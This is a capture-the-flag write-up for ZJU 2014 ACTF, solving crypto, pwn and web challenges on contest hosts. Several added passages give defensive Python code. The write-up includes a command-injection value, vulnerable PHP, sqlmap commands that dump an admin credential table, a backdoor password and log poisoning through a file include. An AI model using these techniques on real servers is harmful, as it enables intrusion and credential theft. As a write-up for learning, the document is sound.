ZJU 2014 ACTF WriteUp by L.

0x00 RE Reverse0

Where is the reversing challenge we were promised?

The challenge author hasn't had breakfast yet, what's the rush? Turn left out the door and go do the Web challenges like a good kid, OK?

Flag: OK

0x01 Ancient CRYPTO100

The flag for this challenge is not wrapped in ACTF{}.

oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?

A substitution cipher. Solved with alexbers' solver (the `cat` in the original notes was a typo for `echo`, and `cd` was doubled):

git clone https://github.com/alexbers/substitution_cipher_solver.git
cd substitution_cipher_solver/
echo "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?" > encrypted.txt
./decrypt.py

Best key: ervglxyzohiqdsnbamfjpwkutc, bad_words 2
nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?

FLAG: cryptooosocoolamiright

0x02 Appetizer EXPLOIT100

nc 218.2.197.236 2009

crypto200.tar.gz

Stack overflow: overwrite the saved return address with the address of the game function so that it gets executed.

0x03 Social Engineering MISC100

I hear that ACTF participants ?潘慷枷不渡咸??)

Tieba: searched the whole bar for ACTF and found the Flag posted by the test account. Of course, the later challenges would be rather more painful ;-)

0x04 The Road to the Flag Web100

Young man, won't you give it a go? http://218.2.197.236:2005/index.php

Opening the link gives the prompt "Can you GET the way to flag?"

Viewing the page source reveals:

<!--way = "H4ck_F0r_Fun!GoGoGo!" -->

So: http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!

0x05 The Grudge of Not Getting a Ticket CRYPTO200

Couldn't buy a TI4 ticket; life looks so bleak.. crypto200.tar.gz

Referred to a CTF that had a similar challenge, wrote a script, and recovered the key:

http://v0ids3curity.blogspot.com/2014/01/hack-you-ctf-2014-crypto-100-easy-one.html

Key obtained: DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo

Removing the repeated part gives DoNotTryToGuessWhatDoesD3AdCa7ThinkOf

Decrypting enc2 gives the plaintext:

High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}

0x06 Kill the Pig and Eat the Meat EXPLOIT200

nc 218.2.197.236 2010 crypto200.tar.gz

Loading the program into IDA shows that it recognises four commands:

killPig (note the trailing space)

When this command is entered, the program first allocates an 8-byte buffer and stores its address in cs:auth. It then checks whether the string following "killPig " is longer than 0x1E bytes; if it is not, 8 bytes of that string are copied into the buffer, otherwise the copy is skipped.

reset

Frees the address stored in cs:auth.

feedPig

Allocates a new block for the string following feedPig and stores its address in cs:service.

EatIt

Obviously the command that retrieves the key. It is guarded by a check, though: if the address stored in cs:auth plus 0x20 holds content, the key is echoed back, otherwise it is skipped.

So the key point is to get content at cs:auth + 0x20.

A plain "killPig " + string does not work because of the length limit.
The author probably intended: killPig first, then reset to free the buffer just allocated, then feedPig to reuse that address with a string longer than 0x20 bytes.

But it turned out that simply sending feedPig after killPig places the new chunk at the first address + 0x20, which already does the job ;-)

0x07 The Annoying Admin WEB200

The FLAG is in admin's hands! http://218.2.197.236:2005/web200/index.php

At first the challenge had a bug: any username and password got you the logged-in page.

The response headers reveal a Real address; visit it. Only the administrator has access, so modify the cookie: admin=1

This yields the Flag.

Because of that initial bug we went astray at first and kept focusing on injecting the login form, but could not dump any data from the username and password columns of web100.admin; the organisers later patched the bug.

0x08 S4ndb0x MISC300

Enumerated with a rather laborious method: because of the rate limit, requests were sent from Burp at roughly one every 32 s, and the flag was enumerated with the following program (the exit status leaks one character at a time):

int main(int argc, char **argv, char *i) { return i=*++argv, i=i+0, *i - 'A'; }

ACTF{c6e49c9b897cc4dba15b39ec53bd8fd681937b8ae16833a24090f27d71d3f8c5}

0x09 Meow Meow Meow Meow WEB300

Admin Xiao Lu set up a server, but it seems to have quite a few vulnerabilities.

http://218.2.197.236:2001/index.html

Nothing turned up at first; later a tiny note appeared on the About page:

This doubi web blog layout is provided by ./bc

In the bc directory one link has an arbitrary file read, but ".." is filtered:

<?php
$url = $_GET['uuu'];
$url = str_replace("..", "", $url);
$file = fopen("$url", "r") or exit("Unable to open file!");
// Output a line of the file until the end is reached
while (!feof($file)) {
    echo fgets($file) . " ";
}
fclose($file);
?>

Reading /etc/passwd reveals HINT:x:500:500::/usr/share/ngInx/html:/bin/bash, which lets us read login.php from the web root.
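As an added example (Python, not the challenge's or the author's code), the weak check above reproduced next to the check that actually fixes it: the PHP filter is a single non-recursive string replacement and never restricts where the resulting path points, whereas the hardened version decides on the resolved path and its containment in a base directory. The base directory WEB_ROOT is an assumption.

```python
import os

# Assumed document directory the handler may serve files from (not stated on the page).
WEB_ROOT = "/usr/share/nginx/html/bc"


def weak_filter(url):
    """The challenge's check, reproduced from its PHP: one non-recursive removal of '..'."""
    return url.replace("..", "")


def strict_resolve(base_dir, user_path):
    """Return the absolute path to open, or None if it would leave base_dir.

    The decision is made on the resolved path (symlinks and '..' already applied),
    not on the raw string, so no string filtering of the input is needed at all.
    """
    if not user_path or "\0" in user_path:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_path is absolute; the containment check catches that.
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```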

login.php has a SRUN3000-style command execution: ?gongwan=1|ls > /tmp/x lists the directory.

Reading DBINFO gives the flag:

<?php
$salt = "abchefghjkmnpqrstuvwxyz0123456789"; // Salt hash to help secure your passwords, it's recommended that you change this to something unique and long
$captcha_salt = "abchefghjkmnpqrstuvwxyz123456789"; // create a new CAPTCHA Salt for this session
$dbhost = "localhost";
$dbname = "FLAG"; // mysql database name
$dbuser = "FLAG"; // mysql database username
$dbpass = "ACTF{300deeaSyFlAGmemeDa}"; // mysql database password
$pre = "onecms_"; // prefix for onecms tables
?>

0x0A Big Brother aay's Secret CRYPTO400

Big Brother aay gave you a mysterious file; deal with it. flag.rar

An encrypted RAR archive; each file inside can be seen to be 5 bytes in size and has a CRC value.

Saving ACTF{ as 1.txt and compressing it with encryption produced the same CRC, which confirmed the approach: brute-force the CRC.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// crc32.h
#ifndef _CRC32_H
#define _CRC32_H
UINT crc32(UCHAR *buf, int len);
#endif

static UINT CRC32[256];
static char init = 0;

// Initialise the lookup table
static void init_table()
{
    int i, j;
    UINT crc;
    for (i = 0; i < 256; i++) {
        crc = i;
        for (j = 0; j < 8; j++) {
            if (crc & 1) {
                crc = (crc >> 1) ^ 0xEDB88320;
            } else {
                crc = crc >> 1;
            }
        }
        CRC32[i] = crc;
    }
}

// CRC32 implementation
UINT crc32(UCHAR *buf, int len)
{
    UINT ret = 0xFFFFFFFF;
    int i;
    if (!init) {
        init_table();
        init = 1;
    }
    for (i = 0; i < len; i++) {
        ret = CRC32[((ret & 0xFF) ^ buf[i])] ^ (ret >> 8);
    }
    ret = ~ret;
    return ret;
}

int main()
{
    // Candidate alphabet for the 5-byte plaintext files
    char ss[] = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! ";
    char sss[6] = {0};
    int a, b, c, d, e;
    int n = (int)strlen(ss);
    UINT _crc32 = 0;
    for (a = 0; a < n; a++) {
        for (b = 0; b < n; b++) {
            for (c = 0; c < n; c++) {
                for (d = 0; d < n; d++) {
                    for (e = 0; e < n; e++) {
                        sss[0] = ss[a];
                        sss[1] = ss[b];
                        sss[2] = ss[c];
                        sss[3] = ss[d];
                        sss[4] = ss[e];
                        _crc32 = crc32((UCHAR *)sss, 5);
                        // CRC of the target entry in the archive
                        if (_crc32 == 0xCA2AA4DE) {
                            printf("%s\n", sss);
                            system("PAUSE");
                        }
                    }
                }
            }
        }
    }
    return 0;
}

CRC32 has collisions, but the context of the words makes the final flag unambiguous.
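As an added example (Python, not the writeup's code), the same recovery without the 67^5 search: CRC-32 is linear, so for a fixed first byte the remaining four bytes of a 5-byte file are uniquely determined by the stored CRC, and the whole candidate set has at most 67 members (one per first character). The alphabet and the target value 0xCA2AA4DE are the ones from the brute force above; this generalises it and is why an archive CRC leaks the content of very short files.

```python
import zlib

POLY = 0xEDB88320
TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)
# For this polynomial the top byte of every table entry is distinct, so it can be inverted.
TOP_BYTE_TO_INDEX = {entry >> 24: k for k, entry in enumerate(TABLE)}

# The candidate alphabet used by the brute force above.
ALPHABET = b"qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}_! "


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def forge_suffix(prefix, target_crc):
    """Return the unique 4 bytes s with crc32(prefix + s) == target_crc."""
    reg = crc32(prefix) ^ 0xFFFFFFFF   # raw shift register after the prefix
    want = target_crc ^ 0xFFFFFFFF     # raw register we need to end on
    # Backward pass: the final register depends only on the four table indices
    # used, so peel them off the wanted value one byte at a time.
    idx = [0] * 4
    for i in range(3, -1, -1):
        idx[i] = TOP_BYTE_TO_INDEX[want >> 24]
        want = ((want ^ TABLE[idx[i]]) << 8) & 0xFFFFFFFF
    # Forward pass: choose each byte so the register lands on that index.
    out = bytearray()
    for k in idx:
        out.append((reg ^ k) & 0xFF)
        reg = TABLE[k] ^ (reg >> 8)
    return bytes(out)


def candidates_5byte(target_crc, alphabet=ALPHABET):
    """Every 5-byte string over alphabet with the given CRC: at most len(alphabet) of them."""
    found = []
    for first in alphabet:
        s = bytes([first]) + forge_suffix(bytes([first]), target_crc)
        if all(b in alphabet for b in s[1:]):
            found.append(s)
    return found
```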

0x0B Sponsor MISC400

Everyone, come and look at the sponsor! hidden.png

After downloading the image and processing it in Photoshop, the shape of the QR code is already quite clear. Comparing it with the image on the official website, the pixels are identical apart from the QR code, so a Python diff of the two images regenerates the QR code.

The QR code is Version 3, 29*29; the three finder-pattern corners are all a QR code needs, but this image is still missing one row and one column at the bottom right, giving 2^17 possibilities.

At the time I really did generate those 170k QR images and batch-scanned them with a script; because of a problem with the script it produced no result, but I learned the QR code structure in the process.

Structure reference: http://en.wikipedia.org/wiki/QR_code

The bottom right corner holds an alignment pattern, which does not affect the data and can be fixed to black (1); that eliminates 9 modules and leaves 2^8 = 256 possibilities, generated in batch (the script is Python 2 era code, cleaned up to run on Python 3 as well):

#!/usr/bin/env python
# -*- coding:utf-8 -*-
from PIL import Image


def showQRCode(fpath, bit, a):
    bmp = Image.open(fpath)
    bmp2 = Image.open('logo.jpg')   # the official site's image, identical except for the QR modules
    pix = bmp.load()
    pix2 = bmp2.load()
    w, h = bmp.size
    i = 0
    for x in range(0, w):
        for y in range(0, h):
            # Pixels equal to the logo are background (white); differing pixels are QR modules (black)
            if pix[x, y] == pix2[x, y]:
                pix[x, y] = (255, 255, 255)
            else:
                pix[x, y] = (0, 0, 0)
            # Bottom-right alignment pattern: fixed to black
            if (x == 21 and y >= 21 and y <= 25) or (x >= 21 and x <= 25 and y == 21):
                pix[x, y] = (0, 0, 0)
            # The missing row and column: filled from the 8-bit candidate string
            if (x == 21 and y >= 26 and y <= 29) or (x >= 26 and x <= 29 and y == 21):
                if int(bit[i]) == 0:
                    pix[x, y] = (255, 255, 255)
                else:
                    pix[x, y] = (0, 0, 0)
                i += 1
    bmp.save('test' + a + '.png')


if __name__ == "__main__":
    # passdic.list holds the 256 candidate bit strings, one per line
    for a in open('passdic.list', 'r'):
        a = a.rstrip()
        showQRCode("hidden.png", a, a)

Batch recognition again came up with nothing. By then it was the small hours, so I picked up a smartphone and wearily scanned them one by one: one pass, nothing; another pass, and finally, arms giving out, one scanned! Finding a reliable decoder script and batch-processing the images directly would have been better.

The file that decoded was test11010100.

0x0C Gongwan-chan WEB400

If you didn't solve web300 there is little hope of solving this one; do you think you're the adorable Gongwan-chan? ( つ•̀ω•́)つ

(Does Gongwan-chan count as a hint?)

(Neither web300 nor web400 requires a scanner.)

(The flag is not in ACTF format, and the flag you submit need not contain brackets of any kind.)

http://218.2.197.236:2003

Intelligence that can now be disclosed:

The administrator is a very lazy person; his notes contain almost no filler.

Following the hint, the command execution and file read from web300 turn up a note like this:

Visit this address on Web400:

From the note there is almost certainly an injection. The look of the page led us astray once more, this time towards MongoDB; after an arduous detour we finally realised that the Base64 was not telling us "gw" but hinting at the injection!--

sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1
sqlmap -u http://218.2.197.236:2003/hejUbiAn.php --tamper "base64encode.py" --data password=1 -D raw_admin -T admin --dump

Database: raw_admin
Table: admin
[3 entries]
+--------------------+-----------------+
| login              | password        |
+--------------------+-----------------+
| gw                 | gongwandaiskkkk |
| Fuckingluyuhao.php | 906239288       |
| luyuhaoxiaodaibi   | luyuhaodadaibi  |
+--------------------+-----------------+

With this dumped, 906239288 is known to be the "goddess" from the note.

Baidu turns up http://www.baidu.com/p/%E8%92%B2%E8%91%B5%E9%A6%99%E7%AF%86301?from=zhidao, nothing useful.

Weibo has the information:

Hence the backdoor: http://218.2.197.236:2003/Fuckingluyuhao.php, password wangbiyun

An alias backdoor, probably placed under /var/tmp/.

This yields the Flag.

0x0D The Deranged Hacker WEB500

Admin Xiao Lu's server was thoroughly owned (see web300), and the boss chewed Xiao Lu out. The boss then ordered Xiao Lu to rebuild it, so Xiao Lu set up the web300 site again on some internal network with a different stack (the original was nginx) and patched some of the vulnerabilities. Both the boss and Xiao Lu are users on that server, so whenever the boss finds that Xiao Lu has written vulnerable code again it is promptly recorded on the server.

Accept the challenge, hackers, and pwn this internal server whose location is unknown!!!

(This challenge is closely tied to the earlier web challenges!!!)

(Some key files are reset every ten minutes!!!)

(The flag does not contain the string ACTF and contains no brackets of any kind!!!)

(Drink All The Booze , Hack All The Things!!!)

Step one: locate the server.

From the hint it is clearly related to WEB300.

Using the WEB300 vulnerability, the WEB300 server's information was collected as follows:

Linux gamebox 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

eth0      Link encap:Ethernet  HWaddr 00:0C:29:7A:61:32
          inet addr:172.17.1.2  Bcast:172.17.1.7  Mask:255.255.255.248
          inet6 addr: fe80::20c:29ff:fe7a:6132/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8322561 errors:0 dropped:0 overruns:0 frame:0
          TX packets:7889370 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:969748319 (924.8 MiB)  TX bytes:9273711147 (8.6 GiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:13053905 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13053905 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:41653303424 (38.7 GiB)  TX bytes:41653303424 (38.7 GiB)

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name
tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      -
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      2130/nginx
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      -
tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      -
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      -
tcp        0      0 0.0.0.0:55129               0.0.0.0:*                   LISTEN      -
tcp        0      0 127.0.0.1:9000              0.0.0.0:*                   LISTEN      515/php-fpm
tcp        0      0 0.0.0.0:3306                0.0.0.0:*                   LISTEN      -
tcp        0      0 :::51855                    :::*                        LISTEN      -
tcp        0      0 :::111                      :::*                        LISTEN      -
tcp        0      0 :::22                       :::*                        LISTEN      -
tcp        0      0 ::1:631                     :::*                        LISTEN      -
tcp        0      0 ::1:25                      :::*                        LISTEN      -
udp        0      0 0.0.0.0:111                 0.0.0.0:*                               -
udp        0      0 0.0.0.0:631                 0.0.0.0:*                               -
udp        0      0 0.0.0.0:636                 0.0.0.0:*                               -
udp        0      0 0.0.0.0:895                 0.0.0.0:*                               -
udp        0      0 0.0.0.0:45324               0.0.0.0:*                               -
udp        0      0 0.0.0.0:914                 0.0.0.0:*                               -
udp        0      0 0.0.0.0:68                  0.0.0.0:*                               -
udp        0      0 :::111                      :::*                                    -
udp        0      0 :::37369                    :::*                                    -
udp        0      0 :::895                      :::*                                    -
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           -
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           -
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           -
raw        0   1080 0.0.0.0:1                   0.0.0.0:*                   7           -
raw        0      0 0.0.0.0:1                   0.0.0.0:*                   7           -
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     11013  -                   @/var/run/hald/dbus-J7oPQkOOJW
unix  2      [ ACC ]     STREAM     LISTENING     10583  -                   /var/run/rpcbind.sock
unix  2      [ ACC ]     STREAM     LISTENING     7281   -                   @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     10856  -                   /var/run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     10917  -                   /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     10977  -                   /var/run/acpid.socket
unix  2      [ ACC ]     STREAM     LISTENING     12567  -                   public/cleanup
unix  2      [ ACC ]     STREAM     LISTENING     11008  -                   @/var/run/hald/dbus-6ghIWFnai8
unix  2      [ ACC ]     STREAM     LISTENING     12574  -                   private/tlsmgr
unix  2      [ ACC ]     STREAM     LISTENING     12578  -                   private/rewrite
unix  2      [ ACC ]     STREAM     LISTENING     12582  -                   private/bounce
unix  2      [ ACC ]     STREAM     LISTENING     12586  -                   private/defer
unix  2      [ ACC ]     STREAM     LISTENING     12590  -                   private/trace
unix  2      [ ACC ]     STREAM     LISTENING     12594  -                   private/verify
unix  2      [ ACC ]     STREAM     LISTENING     12598  -                   public/flush
unix  2      [ ACC ]     STREAM     LISTENING     12602  -                   private/proxymap
unix  2      [ ACC ]     STREAM     LISTENING     12606  -                   private/proxywrite
unix  2      [ ACC ]     STREAM     LISTENING     12610  -                   private/smtp
unix  2      [ ACC ]     STREAM     LISTENING     12614  -                   private/relay
unix  2      [ ACC ]     STREAM     LISTENING     12618  -                   public/showq
unix  2      [ ACC ]     STREAM     LISTENING     12622  -                   private/error
unix  2      [ ACC ]     STREAM     LISTENING     12626  -                   private/retry
unix  2      [ ACC ]     STREAM     LISTENING     12630  -                   private/discard
unix  2      [ ACC ]     STREAM     LISTENING     12634  -                   private/local
unix  2      [ ACC ]     STREAM     LISTENING     12638  -                   private/virtual
unix  2      [ ACC ]     STREAM     LISTENING     12642  -                   private/lmtp
unix  2      [ ACC ]     STREAM     LISTENING     12646  -                   private/anvil
unix  2      [ ACC ]     STREAM     LISTENING     12650  -                   private/scache
unix  2      [ ACC ]     STREAM     LISTENING     12346  -                   /var/lib/mysql/mysql.sock
unix  2      [ ACC ]     STREAM     LISTENING     12725  -                   /var/run/abrt/abrt.socket

root     pts/2        zhutou-centos-1- Sun Apr  6 01:34 - 01:34  (00:00)
root     pts/1        222.205.110.239  Sat Apr  5 12:53   still logged in
root     pts/1        222.205.110.239  Sat Apr  5 12:12 - 12:13  (00:01)
root     pts/1        222.205.110.239  Sat Apr  5 12:09 - 12:11  (00:01)
root     pts/0        zhutou-centos-1- Sat Apr  5 12:07 - 17:16  (05:08)
root     pts/0        222.205.110.239  Sat Apr  5 10:07 - 10:08  (00:01)
reboot   system boot  2.6.32-431.el6.x Sat Apr  5 09:36 - 02:19  (16:42)

ARP -e
Address                  HWtype  HWaddress           Flags Mask            Iface
zhutou-centos-1-gw       ether   00:0c:29:03:c2:e2   C                     eth0
zhutou-centos-2          ether   00:0c:29:b6:4e:b8   C                     eth0
172.17.1.5                       (incomplete)                              eth0

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
172.17.1.0      *               255.255.255.248 U     0      0        0 eth0
link-local      *               255.255.0.0     U     1002   0        0 eth0
default         zhutou-centos-1 0.0.0.0         UG    0      0        0 eth0

zhutou-centos-2 is almost certainly the target machine; ping -c 4 zhutou-centos-2 gives its IP as 172.17.1.3:

PING zhutou-centos-2 (172.17.1.3) 56(84) bytes of data.
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=1 ttl=64 time=0.153 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=2 ttl=64 time=0.166 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=3 ttl=64 time=0.192 ms
64 bytes from zhutou-centos-2 (172.17.1.3): icmp_seq=4 ttl=64 time=0.170 ms

Using curl to reach the arbitrary file read on 172.17.1.3: that vulnerability is still present, but the command execution has been removed. I got to this challenge fairly late, and the temporary files redirected into /tmp kept being deleted by a cleanup script, which wasted some time.

Since the stack had changed to Apache, information gathering continued there.

The access.log history contains requests for fuckti0n.php; reading that file gives:

<?php
if ($_GET[page]) {
    include $_GET[page];
} else {
    include "home.php";
}
?>

An arbitrary file include. A look at php.ini:

disable_functions =
allow_url_fopen = On
allow_url_include = Off

So no remote file inclusion. /etc/passwd has one extra line:

boss:x:500:500::/var/www/boss:/bin/bash

The flag is presumably under boss's home directory, but listing it needs command execution. The only files we can influence at this point are the logs, so the command execution is crafted by writing into the log and having fuckti0n.php include it.
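As an added defender-side example (Python, not code from the writeup), both halves of the technique just described leave traces in the Apache access log: a PHP open tag inside a client-controlled field, and a page= value pointing outside the web root or at a log file. The log lines below are constructed; only the parameter name page and the file name fuckti0n.php come from the challenge.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in Apache "combined" format (not taken from the challenge server).
SAMPLE_LOG = r'''
172.17.1.2 - - [05/Apr/2014:12:10:01 +0000] "GET /fuckti0n.php?page=home.php HTTP/1.1" 200 512 "-" "curl/7.19.7"
172.17.1.2 - - [05/Apr/2014:12:10:09 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "<?php echo 'poisoned'; ?>"
172.17.1.2 - - [05/Apr/2014:12:10:15 +0000] "GET /fuckti0n.php?page=../../../../var/log/httpd/access_log HTTP/1.1" 200 9000 "-" "curl/7.19.7"
172.17.1.2 - - [05/Apr/2014:12:10:21 +0000] "GET /fuckti0n.php?page=/etc/passwd HTTP/1.1" 200 1800 "-" "curl/7.19.7"
'''.strip().splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)           # PHP open tag landing in a log field
ESCAPES_WEBROOT = re.compile(r'(\.\./|^/|/var/log/|access[_.]?log)', re.IGNORECASE)
INCLUDE_PARAMS = ("page",)   # the parameter fuckti0n.php hands to include()


def analyse_line(line):
    """Return (finding, client_ip, timestamp) tuples for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return [("unparsable_line", "-", "-")]
    findings = []
    # 1. Log poisoning: a PHP tag in any client-controlled field Apache writes to the log.
    for field in ("req", "ref", "ua"):
        if PHP_TAG.search(unquote(m[field])):
            findings.append(("php_tag_in_" + field, m["ip"], m["ts"]))
    # 2. Inclusion of a log or other file outside the web root through page=.
    parts = m["req"].split(" ")
    query = parts[1].partition("?")[2] if len(parts) >= 2 else ""
    for param, values in parse_qs(query).items():
        if param in INCLUDE_PARAMS and any(ESCAPES_WEBROOT.search(v) for v in values):
            findings.append(("suspicious_include", m["ip"], m["ts"]))
    return findings


def scan_log(lines):
    """Run analyse_line over every line and flatten the findings."""
    return [f for line in lines for f in analyse_line(line)]
```

Deleting the log entries afterwards, as the challenge's reset script does, removes the evidence; shipping the log off-host before that happens is what makes the pattern above useful.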

After listing the directory, read the file contents.

Who on earth is CX, what goddess, fxxk`

The remaining challenges were not solved; waiting for WannaBe.

{ACTF WriteUp By L. @XDSEC.ORG}

Category: default. Posted: 2015-03-02.
